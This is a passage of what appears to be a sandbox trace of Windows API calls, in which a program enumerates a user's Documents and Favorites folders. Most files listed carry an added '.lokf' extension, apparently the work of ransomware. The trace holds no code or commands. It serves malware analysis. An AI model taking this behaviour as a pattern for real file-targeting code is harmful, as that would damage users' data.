ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0148.254] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x211a7e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0148.254] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.254] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.254] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0148.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.254] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.254] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.254] PathFindFileNameW (pszPath="") returned="" [0148.254] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x211a7e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x211a7e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0148.254] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.254] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0148.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.254] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.254] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.254] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.254] PathFindFileNameW (pszPath="") returned="" [0148.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x20a83c10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.255] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x20a83c10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.255] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x4254e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst.lokf", cAlternateFileName="VOEIMD~1.LOK")) returned 1 [0148.255] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.lokf") returned=".lokf" [0148.255] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x20a83c10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x4254e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst.lokf", cAlternateFileName="VOEIMD~1.LOK")) returned 0 [0148.255] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.255] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.255] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\") returned="R4I1Q ij0VYYLZ2qE\\" [0148.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.255] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.255] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.255] PathFindFileNameW (pszPath="") returned="" [0148.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x20acfed0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.256] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x20acfed0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.256] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5191130, ftCreationTime.dwHighDateTime=0x1d4ce88, ftLastAccessTime.dwLowDateTime=0x2660a3c0, ftLastAccessTime.dwHighDateTime=0x1d4c830, ftLastWriteTime.dwLowDateTime=0x20aa9d70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x578d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="97eCjaiIhB-aD14f.odt.lokf", cAlternateFileName="97ECJA~1.LOK")) returned 1 [0148.256] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\97eCjaiIhB-aD14f.odt.lokf") returned=".lokf" [0148.256] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403bc420, ftCreationTime.dwHighDateTime=0x1d4c829, ftLastAccessTime.dwLowDateTime=0x3a1324c0, ftLastAccessTime.dwHighDateTime=0x1d4d59a, ftLastWriteTime.dwLowDateTime=0x20aa9d70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x18525, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TTeO3-kFVQDhs.ppt.lokf", cAlternateFileName="TTEO3-~1.LOK")) returned 1 [0148.256] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\TTeO3-kFVQDhs.ppt.lokf") returned=".lokf" [0148.256] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d2dde0, ftCreationTime.dwHighDateTime=0x1d4ce9a, ftLastAccessTime.dwLowDateTime=0xebf36fc0, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x173c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHk HXQOnf5.odp.lokf", cAlternateFileName="VZHKHX~1.LOK")) returned 1 [0148.256] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\R4I1Q ij0VYYLZ2qE\\VzHk HXQOnf5.odp.lokf") returned=".lokf" [0148.256] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d2dde0, ftCreationTime.dwHighDateTime=0x1d4ce9a, ftLastAccessTime.dwLowDateTime=0xebf36fc0, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0x20acfed0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x173c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VzHk HXQOnf5.odp.lokf", cAlternateFileName="VZHKHX~1.LOK")) returned 0 [0148.256] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.257] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.257] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0148.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.257] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.257] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.257] PathFindFileNameW (pszPath="") returned="" [0148.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.258] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x20b8e5b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.258] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d47720, ftCreationTime.dwHighDateTime=0x1d4cafa, ftLastAccessTime.dwLowDateTime=0x8164ae70, ftLastAccessTime.dwHighDateTime=0x1d4d1b2, ftLastWriteTime.dwLowDateTime=0x20af6030, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdaa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1y8uVRiNT7yn.odp.lokf", cAlternateFileName="1Y8UVR~1.LOK")) returned 1 [0148.258] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\1y8uVRiNT7yn.odp.lokf") returned=".lokf" [0148.258] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a4add0, ftCreationTime.dwHighDateTime=0x1d4ca53, ftLastAccessTime.dwLowDateTime=0x66439a30, ftLastAccessTime.dwHighDateTime=0x1d4d422, ftLastWriteTime.dwLowDateTime=0x20b1c190, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERvgLja.ots.lokf", cAlternateFileName="ERVGLJ~1.LOK")) returned 1 [0148.258] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\ERvgLja.ots.lokf") returned=".lokf" [0148.258] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x212664f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x212664f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mw2tK3t ch7R6yApjv", cAlternateFileName="MW2TK3~1")) returned 1 [0148.258] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e41430, ftCreationTime.dwHighDateTime=0x1d4caff, ftLastAccessTime.dwLowDateTime=0xa3eb90b0, ftLastAccessTime.dwHighDateTime=0x1d4cd7c, ftLastWriteTime.dwLowDateTime=0x20b422f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x16ca2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nqPYpTIV1l.doc.lokf", cAlternateFileName="NQPYPT~1.LOK")) returned 1 [0148.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\nqPYpTIV1l.doc.lokf") returned=".lokf" [0148.259] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b33ed90, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0x21324bd0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21324bd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pW62l8V1WmQv", cAlternateFileName="PW62L8~1")) returned 1 [0148.259] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a225a30, ftCreationTime.dwHighDateTime=0x1d4c844, ftLastAccessTime.dwLowDateTime=0x6b59fcd0, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x20b68450, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15c5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qsrLr5Sl.csv.lokf", cAlternateFileName="QSRLR5~1.LOK")) returned 1 [0148.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\qsrLr5Sl.csv.lokf") returned=".lokf" [0148.259] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68462f60, ftCreationTime.dwHighDateTime=0x1d4c6d9, ftLastAccessTime.dwLowDateTime=0xfbb4e9a0, ftLastAccessTime.dwHighDateTime=0x1d4ce75, ftLastWriteTime.dwLowDateTime=0x20b68450, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7354, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdc1X rXuBGflZJUC.xls.lokf", cAlternateFileName="TDC1XR~1.LOK")) returned 1 [0148.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\tdc1X rXuBGflZJUC.xls.lokf") returned=".lokf" [0148.259] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5ae690, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0x744b50f0, ftLastAccessTime.dwHighDateTime=0x1d4d049, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x19045, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdJqAyQOW.ots.lokf", cAlternateFileName="WDJQAY~1.LOK")) returned 1 [0148.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\wdJqAyQOW.ots.lokf") returned=".lokf" [0148.259] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5ae690, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0x744b50f0, ftLastAccessTime.dwHighDateTime=0x1d4d049, ftLastWriteTime.dwLowDateTime=0x20b8e5b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x19045, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdJqAyQOW.ots.lokf", cAlternateFileName="WDJQAY~1.LOK")) returned 0 [0148.259] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.260] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.260] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0148.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0148.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.260] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.260] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.260] PathFindFileNameW (pszPath="") returned="" [0148.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20bda870, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.260] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20bda870, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.260] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.260] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0148.260] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x20bb4710, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x23a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url.lokf", cAlternateFileName="SUGGES~1.LOK")) returned 1 [0148.260] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.lokf") returned=".lokf" [0148.260] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url.lokf", cAlternateFileName="WEBSLI~1.LOK")) returned 1 [0148.260] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.lokf") returned=".lokf" [0148.260] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x20bda870, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x230, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url.lokf", cAlternateFileName="WEBSLI~1.LOK")) returned 0 [0148.262] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.262] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.262] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0148.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0148.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.262] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.262] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.262] PathFindFileNameW (pszPath="") returned="" [0148.262] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20c4cc90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20c4cc90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.263] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 